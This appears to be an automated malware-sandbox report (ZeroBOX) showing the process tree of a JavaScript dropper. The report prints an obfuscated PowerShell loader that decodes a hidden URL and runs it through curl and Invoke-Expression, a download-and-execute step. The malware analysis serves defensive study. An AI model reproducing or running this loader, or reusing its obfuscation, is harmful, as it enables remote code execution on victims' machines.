| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\CNOZ1237_3680420.js

    2552
  • conhost.exe conhost --headless powershell $qvmkxbdtleof=(4161,4146,4163,4167,4164,4168,4147,4158,4092,4162,4157,4158,4093,4095,4092,4158,4150,4158,4109,4150,4143,4161,4150,4107);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $qvmkxbdtleof){$awi=$rob9e;$ftjxwlmqpdak=$ftjxwlmqpdak+[char]($awi-4046);$vizit=$ftjxwlmqpdak; $lira=$vizit};$nboukqlcagti[2]=$lira;$jwfblk='rl';$five=1;new-alias zwert cu$jwfblk;.$([char](9992-9887)+'ex')(zwert -useb $lira)

    2676

Process contents

No process loaded Click on a process in the tree above to load its data.